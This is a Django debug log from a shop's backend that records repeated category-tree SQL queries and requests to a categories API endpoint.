2019-12-19 11:29:54,923 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:29:54,927 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:29:54,931 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:29:54,935 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:29:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 11:29:55,241 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:29:55,252 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:29:55,258 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:29:55,262 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:29:55,268 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:29:55,272 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:29:55,276 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:29:55,280 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:29:55,285 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:29:55,291 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:29:55,295 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:29:55,299 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:29:55,303 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:29:55,307 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:29:55,313 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:29:55,317 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:29:55,321 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:29:55,325 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 11:29:55,329 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 11:29:55,336 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 11:29:55,340 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 11:29:55,344 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 11:29:55,348 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 11:29:55,352 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 11:29:55,356 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 11:29:55,362 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 11:29:55,366 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 11:29:55,370 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 11:29:55,374 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 11:29:55,378 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 11:29:55,384 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 11:29:55,389 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 11:29:55,393 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 11:29:55,397 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 11:29:55,401 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 11:29:55,409 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 11:29:55,414 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 11:29:55,419 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 11:29:55,423 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 11:29:55,427 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 11:29:55,432 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 11:29:55,439 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 11:29:55,444 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 11:29:55,449 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 11:29:55,454 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 11:29:55,458 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 11:29:55] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 11:36:56] "GET / HTTP/1.0" 302 0 [19/Dec/2019 11:41:59] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 11:44:37,892 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 11:44:37,899 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 11:44:37,902 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 11:44:37,905 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 11:44:37,908 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 11:44:37,910 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 11:44:37,913 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 11:44:37,915 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 11:44:37,917 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 11:44:37,920 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 11:44:37,922 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 11:44:37,925 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 11:44:37,927 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 11:44:37,929 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 11:44:37,932 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 11:44:37,934 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 11:44:37,937 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 11:44:37,939 